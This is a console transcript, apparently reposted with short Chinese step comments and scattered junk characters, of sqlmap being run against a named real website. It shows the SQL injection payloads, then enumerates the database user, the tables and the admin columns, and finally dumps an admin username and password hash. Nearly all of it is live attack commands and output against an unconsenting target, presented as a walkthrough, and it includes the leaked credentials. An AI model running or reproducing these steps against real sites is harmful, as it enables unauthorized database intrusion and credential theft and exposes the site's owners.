D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! R o5 M" Y, N- Y+ [
ms "Mysql" --current-user /* 注解:获取当前用户名称$ c- U& a8 b( F" ` {# _
sqlmap/0.9 - automatic SQL injection and database takeover tool( K. ^8 d5 r; ~) \( e
http://sqlmap.sourceforge.net starting at: 16:53:54. i4 c2 C M8 s. S+ {3 Z
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as [- n. h( u D5 o {, h- G9 i* a F
session file/ J; u3 M3 U& G: E2 h+ D
[16:53:54] [INFO] resuming injection data from session file# A1 ^ j" S# w* j9 M0 A( f
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
; K' z6 K, T- i[16:53:54] [INFO] testing connection to the target url2 Z* t5 v2 ?0 l! U) F* t
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 L8 q0 Y* L3 z1 }4 g1 K5 ]sts:
I i$ O' E; I---
* T5 ?! D1 Y$ e8 A: p5 ^Place: GET
( k3 P3 P: v: l0 A3 [. K7 I8 [7 BParameter: id% V5 g4 Q% c2 d; o; v; J
Type: boolean-based blind& U% d+ L" F+ L
Title: AND boolean-based blind - WHERE or HAVING clause
( P! G* A+ p) z& } @2 _9 N/ s1 K6 m Payload: id=276 AND 799=799
# W5 k9 \1 w# o" o Type: error-based6 s* h* f2 C( H. p. t* H: W4 S
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# d6 L/ ^! \3 h8 b
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 H5 a0 n! c& i( U
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. ?# [, s3 B7 b- {& J2 {* o),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)* T/ o/ i$ g6 r! ~
Type: UNION query& z3 p0 |; \& p2 q9 @
Title: MySQL UNION query (NULL) - 1 to 10 columns3 b c Y7 l7 e% Z+ j Y/ @' a) H
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 x2 k* N1 [7 ~" Q: n& [- \, H! J' M
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
8 o i7 G* n" ^) c VCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ g6 F5 q6 s6 g7 p0 H' j( O
Type: AND/OR time-based blind
- Q# L" E; x) K; U Y2 J( E Title: MySQL > 5.0.11 AND time-based blind
( v r; P) X7 {% k' [ Payload: id=276 AND SLEEP(5)
! a8 W/ _* z" E. t! N---
3 p% h' ~6 s! `6 [ N4 u/ |[16:53:55] [INFO] the back-end DBMS is MySQL$ k9 g/ I! p9 d" d# I2 J
web server operating system: Windows1 W% v1 ^% J: Y
web application technology: Apache 2.2.11, PHP 5.3.0+ c; B0 ~% J; a4 o
back-end DBMS: MySQL 5.0
* `. n% w* n b$ {' k/ J* D[16:53:55] [INFO] fetching current user( w3 ]# x. e1 ^! {# I8 N
current user: 'root@localhost'
; w( n& t5 i s6 C[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
5 f+ |* T! f1 w3 C j2 k& htput\www.wepost.com.hk' shutting down at: 16:53:58+ D3 ?& C; n) u$ q( k5 |
1 K8 U9 o4 p" F2 J+ T: B( L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: D) w( W9 @- d% Vms "Mysql" --current-db /*当前数据库
5 f R2 @) s4 m. i5 i sqlmap/0.9 - automatic SQL injection and database takeover tool3 C$ W) @% V) d3 g
http://sqlmap.sourceforge.net starting at: 16:54:16 e' v& s' Z$ c! N9 z ~; d
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# l" N# t7 d+ B9 q4 t. q) N* H
session file6 @- t4 e) Z# g. W
[16:54:16] [INFO] resuming injection data from session file
. w0 ?0 Q% g: o' W; K1 I; I6 O[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* A; l, f4 y$ [" k
[16:54:16] [INFO] testing connection to the target url) W, v$ ? v& u2 Z1 R" j4 n" _" s+ y% M
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 K6 [/ k7 c3 Y, [; N0 I1 c
sts:
& @/ }$ B' N( S3 Y/ R5 z---
: n& E& h0 R# \4 G( R0 sPlace: GET
c% J2 b: O1 S' u; [Parameter: id
% ?5 e9 u) z. ] B7 \7 y+ V Type: boolean-based blind" n4 Y3 @ p, V) k5 {$ T1 \. N
Title: AND boolean-based blind - WHERE or HAVING clause6 j+ z0 M% ~) {) A" h$ a
Payload: id=276 AND 799=799
& e, q( A. g9 O+ ]) A5 T5 @ Type: error-based* B( s1 c8 U% ]# B
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) m+ _: x2 }1 d+ E
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) ?! z, r8 u: N5 ?. `$ O
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 ?; U. P8 Q2 ^: ]( v" \
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ S; s6 O% k0 m; e Type: UNION query
0 S. R8 R6 M1 u" u+ R7 m Title: MySQL UNION query (NULL) - 1 to 10 columns
- Z! R! Z4 s5 K4 L# n6 i! K Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR; G" j" W; t+ |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% U S: S8 H3 |% \- s1 q7 }
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 d# a' Y2 r4 o0 _8 U6 U1 X Type: AND/OR time-based blind
* z5 ]' G3 _0 N* z4 ~4 G Title: MySQL > 5.0.11 AND time-based blind
: N k. _# b' Y' W% p Payload: id=276 AND SLEEP(5)6 i6 Y" M- t# F
---
! Z$ Q" _) ?8 w! f, q[16:54:17] [INFO] the back-end DBMS is MySQL
) b" R3 K" U) m0 X. K$ k' tweb server operating system: Windows
3 t1 O- k2 _# D! Lweb application technology: Apache 2.2.11, PHP 5.3.0
/ R0 K i: H& `* F9 [3 fback-end DBMS: MySQL 5.0
4 p& K( m8 |$ g1 E3 [: C6 [[16:54:17] [INFO] fetching current database7 L" D' Y g- Z% K1 M! n+ b- F) ^
current database: 'wepost'6 h4 b- Z. m7 K+ \+ \! }
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou5 S& a& w8 p- E$ D7 J
tput\www.wepost.com.hk' shutting down at: 16:54:18' b5 g/ U/ c6 d, e/ ~
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. _6 J6 K b/ @* H# wms "Mysql" --tables -D "wepost" /*获取当前数据库的表名4 x! J" Y ?& u7 u
sqlmap/0.9 - automatic SQL injection and database takeover tool g7 }5 y0 R0 L' e8 Y
http://sqlmap.sourceforge.net starting at: 16:55:25
1 y2 L+ A" D; Q7 `' l! {[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
* p3 w1 y1 R- a2 A7 ^" O session file/ u W' e* |9 v4 y; N" o0 |
[16:55:25] [INFO] resuming injection data from session file
2 {6 f) y ^9 I0 N$ e Y[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 D4 O, ^' F" E9 L[16:55:25] [INFO] testing connection to the target url
3 g, Q% V& D9 Y" a8 ]$ `+ Ksqlmap identified the following injection points with a total of 0 HTTP(s) reque8 ]& t9 u6 i, {8 Y2 k& u
sts:/ A6 K K' d/ f
---) [! z3 t- I+ L- `- c
Place: GET
; s3 `7 t' ?! x/ H* b4 WParameter: id G; u! \6 n# N7 x3 g2 Q y+ c
Type: boolean-based blind# S8 s2 v1 T) `3 g5 i: g7 ~
Title: AND boolean-based blind - WHERE or HAVING clause
+ c3 p" g( y0 I& M; c) \5 a Payload: id=276 AND 799=799, @4 K+ u0 B5 Z3 V6 E+ ?
Type: error-based8 Q# m8 [. L c F
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( ?/ i u' k0 Q, i- O4 C Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: h7 g5 o3 W4 V4 _% Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ \" N0 X) j4 ]# K, S; L
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
6 i2 g+ Q" y( }& d2 y8 n4 c Type: UNION query
3 h. T; D, x* V8 |+ t0 }( i1 [. }( J Title: MySQL UNION query (NULL) - 1 to 10 columns0 l% M- d0 S' _( T- T
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
5 X5 m. U$ t4 ~4 w; Y! `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
$ ~7 l2 H. o9 s! U$ W" J `) ?CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 f: k: \" N% @
Type: AND/OR time-based blind# i, G2 U2 b) F0 e- E; J
Title: MySQL > 5.0.11 AND time-based blind1 n7 y4 F5 q8 j: s
Payload: id=276 AND SLEEP(5)! F* O) ?7 W2 {" P, N
---/ H6 S8 Z0 r* R/ Q! A( J: h
[16:55:26] [INFO] the back-end DBMS is MySQL( z9 ^1 w' Q* H$ @+ Z; B _, Q
web server operating system: Windows
/ I: J+ d. @) d4 ?% v: Wweb application technology: Apache 2.2.11, PHP 5.3.0
3 P$ l& \# h5 D/ Qback-end DBMS: MySQL 5.0
|0 O' m; w! ?[16:55:26] [INFO] fetching tables for database 'wepost'' \- j7 U! ?: q. f! R( ]+ G
[16:55:27] [INFO] the SQL query used returns 6 entries" m: F$ i0 L7 i* O6 [
Database: wepost7 Y! r0 ]8 Z/ e- [4 d+ v
[6 tables]
* N/ B" E+ ?8 i; F+ d" ]( p+-------------+* U o! Y v2 A% q( E4 q' b0 Q% N8 R
| admin |1 d/ @4 d _' g. q
| article |! ^1 m1 a" q0 R
| contributor |5 {2 T |1 m' D7 |) P
| idea |
6 k) @7 D* d4 n6 f! B$ s' c| image |
0 |7 ^( O+ U, p9 d| issue |/ o2 f- i9 |: _% O+ q5 s: @
+-------------+
, X8 @) M; |6 f4 J4 s j* q[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
$ b, R+ u" @5 P6 f' v% q8 n% b0 X, ttput\www.wepost.com.hk' shutting down at: 16:55:33
2 ~9 D+ \1 H6 f" b/ X6 u* A6 w9 y, f# L. u( L# [, P
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db+ Z: @+ J& Y+ Q+ ~
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
6 y- v9 T, f$ O' k8 P% W0 w sqlmap/0.9 - automatic SQL injection and database takeover tool
; Y- i8 H* u U$ o9 m9 a http://sqlmap.sourceforge.net starting at: 16:56:06
7 d6 Z6 O% s3 ^4 _sqlmap identified the following injection points with a total of 0 HTTP(s) reque% Q9 h, p+ I, ^0 F: J! x. c/ V0 Z
sts:
; {& @3 j8 N/ g/ s. {---- b+ K% G4 T: X
Place: GET
$ n4 N; M: S2 n" FParameter: id( {, @$ V; S$ D6 {8 A1 a& ~
Type: boolean-based blind: K: T- z3 Z( D, _
Title: AND boolean-based blind - WHERE or HAVING clause
9 Q/ R. f) S. y% t- X+ j1 j" N- H, N Payload: id=276 AND 799=799
+ O5 w9 {6 M8 @0 K0 @/ H7 J% u3 l Type: error-based
- U) a# H' s/ Q1 c2 x Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause6 ^# V" B& e5 Y& x3 h9 X: H' a
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
1 p( A1 B: u* ~* h120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' F$ i7 p5 U% E* Z( o
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 ^, s' B$ Z* ~! R1 Z9 ^# L
Type: UNION query* Z3 V2 X+ R7 L( a; Y
Title: MySQL UNION query (NULL) - 1 to 10 columns: e" H& C" i; |% g1 W* K
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% c- ~) N6 J- y A
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ W3 j" u3 ?2 D A$ f
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
* C6 T5 y2 K( D6 v5 G6 N Type: AND/OR time-based blind
o6 A; B5 I3 E0 y. |( e. m9 S2 p2 P Title: MySQL > 5.0.11 AND time-based blind$ _0 V+ |! Q+ ]) ]# z$ w
Payload: id=276 AND SLEEP(5)0 A4 v8 n, A* D+ e% {
---
, \- I3 |5 u# r2 E) Kweb server operating system: Windows5 G4 X5 M- V* N
web application technology: Apache 2.2.11, PHP 5.3.0
& d( _4 g0 c! Fback-end DBMS: MySQL 5.08 g/ [2 }" j$ G% p: }' h9 u
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
! t/ U$ n: I& ^+ d P% ]9 Dssion': wepost, wepost i2 v* R0 L( |6 l
Database: wepost
, O- B" `- y; lTable: admin
! a, I7 I z( m' K$ e0 G- J5 v[4 columns]
6 `" E7 l% m3 |4 O8 t9 ]. z+----------+-------------+
( P6 ?3 w4 B0 j2 d6 i) s| Column | Type |, x2 n) \) t! {& e2 Q
+----------+-------------+3 [* Y) I% J0 F
| id | int(11) |
! g) S8 \- f* \4 [4 b1 w| password | varchar(32) |
) ?" h5 x+ Y: ]. T4 G) F" E% r. [+ U6 `| type | varchar(10) |" t+ @7 t7 w6 U$ W+ X. }
| userid | varchar(20) |* \" S$ q$ ?. Y( t
+----------+-------------+
) Q8 m% c* T8 ?6 w0 {# v; N& r9 } shutting down at: 16:56:19# _# b1 q' }2 a
+ Q$ }& ^+ p, I$ n7 n1 P! M1 O7 YD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 |, x8 _; e3 w% `$ ams "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容0 W g; ?# [& V6 U
sqlmap/0.9 - automatic SQL injection and database takeover tool) ?: r. c3 u5 u
http://sqlmap.sourceforge.net starting at: 16:57:14
8 C% J5 p6 I# D( _9 r: csqlmap identified the following injection points with a total of 0 HTTP(s) reque% a( h, g! }; X& q8 h r
sts:$ m6 T) |9 x* B8 H0 f0 r, ?5 B9 n
---) U6 e( m3 ?, A8 K5 L
Place: GET5 v9 P4 W: A& C% L3 r) N
Parameter: id- _# F" ?" _8 \( ]' `0 R( T
Type: boolean-based blind
' k5 D% g' c4 R: V7 U! T Title: AND boolean-based blind - WHERE or HAVING clause
$ K! H$ _- ]* j/ J* t5 i' Q Payload: id=276 AND 799=799, N8 F% u- ~7 F' g: n W8 y8 j& p
Type: error-based
2 E6 M. i' Y9 V Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- l- H ?& l, z3 s* z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 E; f9 p4 i% W) D120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 ~6 L$ ~8 J/ j9 `* {. Z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 u5 l1 x" f7 U* X* a& j2 ? Type: UNION query% M- i. u/ e: t4 \. d; W
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 a: I) i% C, C" [3 g9 a/ | Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" V, P& n% f) t* C0 l
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 N2 L% S' P' M; z7 `: M
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## g( }- F! @" y* y
Type: AND/OR time-based blind& x/ K: X% I `+ K0 w6 S
Title: MySQL > 5.0.11 AND time-based blind% O/ s! }$ k8 F' J" Z$ @/ [
Payload: id=276 AND SLEEP(5)9 r' a# B$ y( t, t6 ]
---
- c- ^: X9 F" k2 O; ^; ?: f+ Uweb server operating system: Windows8 s5 p/ ~+ @1 U
web application technology: Apache 2.2.11, PHP 5.3.0
$ b+ s( ]: a5 H, Q3 bback-end DBMS: MySQL 5.0( h+ y2 Y+ q3 r" j T
recognized possible password hash values. do you want to use dictionary attack o3 J3 _2 E4 b" r7 u
n retrieved table items? [Y/n/q] y, G; h6 o6 { h, k1 ?
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]% G. e6 a- C4 S y
do you want to use common password suffixes? (slow!) [y/N] y, ~) L5 ?9 J% e3 I `& M
Database: wepost
" a- x0 L$ p' T" D& F& w0 K* s7 ~& k# BTable: admin7 M% b3 A6 h* F4 F+ H$ Q4 O
[1 entry]3 w" o1 I% }; I; N1 S
+----------------------------------+------------+
3 S- x, c G" K| password | userid |
7 `, a$ H$ `8 Z+----------------------------------+------------+) C) L* ~) \0 `' P3 t6 S) E
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+ N: p- L! Q+ [" z4 X( s1 n" z+----------------------------------+------------+7 L' R j9 D: j, x" \ ~6 [/ f
shutting down at: 16:58:14. b3 W4 d& y5 Z# X7 \3 u
* B1 t- {6 Q0 R2 o( C* }$ ]
D:\Python27\sqlmap> |